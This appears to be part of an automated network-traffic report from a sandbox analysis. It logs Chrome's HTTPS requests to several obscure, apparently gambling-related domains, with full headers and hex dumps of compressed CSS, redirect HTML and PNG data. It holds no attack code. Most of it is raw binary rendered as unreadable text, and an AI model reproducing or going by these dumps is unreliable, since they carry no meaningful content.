                                                                                                                                                          2024-06-09 22:41:23 UTC9918INData Raw: be 23 51 ae 6c 2a 3d 29 1c 02 1c 02 ac 08 1d b4 fd 52 cd 24 1e e6 7c 1b f0 f1 48 d1 85 08 90 53 d8 ff 63 df ee 22 33 f9 76 b7 38 70 d1 73 b7 7d 7d 33 fe 2a 5c ab 48 18 d6 1b c1 ef f6 d2 0c 4a 26 c1 ee 32 c8 8f 40 b2 f0 d2 cb 3b 7c 91 3e c1 d5 e1 fa 47 6f f8 fa 22 28 9b 32 16 55 f3 85 b5 49 cc ba b6 c5 e6 d7 37 e6 fc 7a f5 31 af 56 9d 1f 78 35 02 af 46 bd 5a a1 af af 8f f5 1b 7b c8 76 76 83 9d 60 c5 ca d5 6c db b6 15 e5 d5 a9 d7 ab 94 2a b5 86 89 8c b5 5a bc c5 ac 42 b1 86 1a 9f 1e 89 7d 31 cf f3 28 16 8b 8d dc 5c 6c 0e e3 f7 a6 52 29 d2 e9 b4 29 61 b9 6e 43 d8 94 52 0d 1a fc f8 78 e3 eb bc f1 03 14 ff af 5e af 53 2c 16 19 1e 1e c6 c5 65 6a fb 34 f2 c9 2c a0 d0 f8 20 02 fc a0 ce ec d9 bb 33 3c 3c 44 ef d6 61 3c 2f a0 b5 a3 a5 fa f1 cb 2f fb ed 6e 7b ee 31
                                                                                                                                                          Data Ascii: #Ql*=)R$|HSc"3v8ps}}3*\HJ&2@;|>Go"(2UI7z1Vx5FZ{vv`l*ZB}1(\lR))anCRx^S,ej4, 3<<Da<//n{1


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          645192.168.2.550429183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC643OUTGET /061410/rcenter/msites/themes/default/content.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC649INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-QD-MP-02-35
                                                                                                                                                          ETag: W/"655579ca-cf89"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:22 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;qdmp02:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-QD-MP-02-35
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-19
                                                                                                                                                          X-Cdn-Request-ID: 3c378deb6798bf6b3b335c71d151935b
                                                                                                                                                          2024-06-09 22:41:23 UTC11755INData Raw: 32 36 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e5 7d 69 6f e4 c8 92 d8 5f a1 7b 30 98 69 5b e4 b0 8a c5 3a 24 3c 61 d7 6f 3f 78 3f ac 0d 18 0f 86 0d c3 68 b0 78 a8 d8 cd 2a d6 90 ac 6e 1d d0 7f 77 46 9e 91 99 91 2c a9 bb c7 80 b1 e0 b4 46 22 33 23 af c8 b8 33 f2 9f ca 43 31 8c f5 14 7d b8 4c 4d bc fd 70 97 1c fb aa e8 6e f7 75 d3 0f f5 4b d5 8e e7 ae 78 ba 3d f5 a7 fa 35 39 f7 63 3b b5 fd 29 fe 36 14 e7 97 73 51 55 ed e9 e1 76 91 9e 1f 23 f3 23 bd eb da 53 1d 1f ea f6 e1 30 dd 2e d7 e7 c7 bb 7d 51 7e 79 18 fa cb a9 8a cb be eb 87 db 5f 9a 8c 3d ab bb 63 31 3c b4 a7 b8 ab 9b 89 83 71 9a 88 0e cb 97 a6 eb 8b e9 16 4a dc a9 06 53 59 8f fd 22 c1 e5 db bc 59 ef ee 9a fe 34 c5 63 fb 5c df 2e b6 ac 59 ab 1f 4b f6 82 7f 6f 8a 63 db 3d dd fe f6 6f 6d 39 f4 63 df
                                                                                                                                                          Data Ascii: 2614}io_{0i[:$<ao?x?hx*nwF,F"3#3C1}LMpnuKx=59c;)6sQUv##S0.}Q~y_=c1<qJSY"Y4c\.YKoc=om9c


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          646192.168.2.55037238.174.148.24434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC576OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: f21714.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://f21714.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:22 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:41:22 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:41:22 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:22 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:41:22 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:41:22 UTC5INData Raw: 35 38 62 0d 0a
                                                                                                                                                          Data Ascii: 58b
                                                                                                                                                          2024-06-09 22:41:22 UTC1426INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 5f 5f 43 42 4b 3d 33 38 37 62 63 34 37 35 63 32 30 33 32 37 61 31 64 39 35 33 34 30 37 64 36 63 66 33 32 64 65 36 31 31 37 31 37 39 37 32 38 38 33 5f 31 32 31 33 37 35 33 39 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/favicon.ico?__CBK=387bc475c20327a1d953407d6cf32de611717972883_12137539" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          647192.168.2.55039338.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC735OUTGET /errors/605.html HTTP/1.1
                                                                                                                                                          Host: e933002.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: route=b4fd844c80a97ccc2b0bc1faae1a3e4c
                                                                                                                                                          2024-06-09 22:41:23 UTC21INHTTP/1.1 605 unknow
                                                                                                                                                          2024-06-09 22:41:23 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:23 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 32 32 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          2024-06-09 22:41:23 UTC39INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html;charset=UTF-8
                                                                                                                                                          2024-06-09 22:41:23 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 7a 68 2d 43 4e 0d 0a
                                                                                                                                                          Data Ascii: Content-Language: zh-CN
                                                                                                                                                          2024-06-09 22:41:23 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:41:23 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 63 64 6e 2d 53 74 61 72 6c 69 6e 6b 2d 4b 52 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from cdn-Starlink-KR
                                                                                                                                                          2024-06-09 22:41:23 UTC22INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 35 33 37 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 4537
                                                                                                                                                          2024-06-09 22:41:23 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:23 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:41:23 UTC2628INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 65 79 77 6f 72 64 73 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 61 75 74 68 6f 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 61 75 74 68 6f 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /><meta name="keywords" content="keywords"/><meta name="description" content="description"/><meta name="author" content="author" /><meta name="Copyright" content="author" /><meta name


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          648192.168.2.55039038.174.148.164434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC595OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: 43370d.top
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://43370d.top/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:41:22 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:22 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:22 UTC29INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 38 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=1800
                                                                                                                                                          2024-06-09 22:41:22 UTC21INData Raw: 45 54 61 67 3a 20 22 35 62 33 33 35 34 61 65 2d 38 63 22 0d 0a
                                                                                                                                                          Data Ascii: ETag: "5b3354ae-8c"
                                                                                                                                                          2024-06-09 22:41:22 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 32 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.2
                                                                                                                                                          2024-06-09 22:41:22 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 32 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          2024-06-09 22:41:22 UTC28INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: image/x-icon
                                                                                                                                                          2024-06-09 22:41:22 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 37 20 4a 75 6e 20 32 30 31 38 20 30 39 3a 31 31 3a 31 30 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Last-Modified: Wed, 27 Jun 2018 09:11:10 GMT
                                                                                                                                                          2024-06-09 22:41:22 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:22 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                                                                                                                          Data Ascii: Accept-Ranges: bytes


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          649192.168.2.55043190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC607OUTGET /pc/image-pc/index/312/nav/sports/sb.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 47037
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:55 GMT
                                                                                                                                                          ETag: "5d71fe87-b7bd"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[4],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE7[4],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465100
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5970abb35c308d2a24707db72e093e9c
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126900
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRuatEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: 1e 4e 6f 59 2c 66 39 13 89 a8 49 8b fb ce 7c d7 e9 ee 54 23 77 ab 0b bc 32 12 f1 3a 8a 11 02 5d 93 40 14 01 15 73 c0 cb cb b2 5a 50 6c d0 c0 73 f8 7c 5d df ff d1 fd 6d a1 aa 4a 63 cd 9d 5c 1b eb 28 3a 6a 57 0b a2 bd db 65 a4 7a ed 7a 1a 32 02 1a a3 fc cc 55 42 e3 9e 53 3e 9b ed 2c 14 58 e4 4a b7 9c 2e 83 20 b9 64 25 78 fc e0 8e 69 75 47 cb e6 54 9c 7c a0 7a 8e 12 cb ee c4 45 9f be c1 10 a3 07 ba d3 fe 79 53 e0 dc f1 e8 57 60 c7 d6 37 2f 1a 1e ec 99 e5 c3 51 9a cb e7 78 7a db 99 67 ad 84 02 02 a8 ab fd 30 54 d6 d6 72 b0 96 6e 30 c7 c8 0a 1a 5b 05 ea 30 52 60 64 fe 69 a2 30 95 ee 50 d9 0d 45 e4 95 42 1e dd 79 2b b4 b4 34 f1 8c a7 0d 2f 6e c4 7b a7 23 09 2e 87 82 d7 2c 2b 4a 24 52 ec 69 9c e8 4a a9 50 b1 bf 0b ad 58 24 c9 4a 4c a1 ef 28 18 08 26 7b c9 62 19
                                                                                                                                                          Data Ascii: NoY,f9I|T#w2:]@sZPls|]mJc\(:jWezz2UBS>,XJ. d%xiuGT|zEySW`7/Qxzg0Trn0[0R`di0PEBy+4/n{#.,+J$RiJPX$JL(&{b
                                                                                                                                                          2024-06-09 22:41:23 UTC14885INData Raw: 13 63 e3 28 d9 54 ec 3f 3a 86 99 24 1d 38 f2 b8 74 a6 e9 50 98 65 2d f8 83 bf 79 0e 7f f3 a1 cf dc 6b 76 5a 05 43 6d 7e eb 67 e6 04 ff 38 71 36 64 53 4a d9 82 f7 92 ec e3 0f 7e af eb c6 37 9e db d5 61 50 16 c4 f8 7d 26 1d e1 51 e8 86 0d 4a 3a 71 0e 41 d8 33 eb ff 73 0c ce 50 d6 c5 5f 69 f5 af 71 aa 85 e8 a0 29 67 3c 2b 94 6e d9 b2 e5 db db b6 5f f0 f7 b3 b3 21 a7 d5 e2 c4 c9 e3 23 08 4e 67 a5 4d 48 9f 26 a0 3b 34 85 11 ba b9 4e ab 1d 47 0f 0d 4a 7a 63 7c e2 30 ea 9a 3b 44 99 b1 b2 ba 86 a2 24 2b f5 a4 51 e0 0d 7d 25 15 53 09 2e 9c 18 50 d2 73 d9 c9 20 d3 e9 8a 6a 41 67 67 27 85 97 61 f2 6a 3d d8 bc f1 02 32 5e 3b 2e f4 6d 97 ce 8d bf ff bb cf a1 a7 7b 90 75 1f 05 d3 89 e8 8a a2 c9 cd 73 28 9d db 73 ca 0f 4d 14 80 2c 3c a1 9f a1 07 c5 9b 63 06 f1 10 b1 c0
                                                                                                                                                          Data Ascii: c(T?:$8tPe-ykvZCm~g8q6dSJ~7aP}&QJ:qA3sP_iq)g<+n_!#NgMH&;4NGJzc|0;D$+Q}%S.Ps jAgg'aj=2^;.m{us(sM,<c


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          650192.168.2.55043590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC383OUTGET /pc/image-pc/index/312/nav/liveCasino/03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 42776
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:48 GMT
                                                                                                                                                          ETag: "5d71fe80-a718"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[2],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE11[4],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fa7047cac5d89bd5371f93fdf158de15
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126900
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
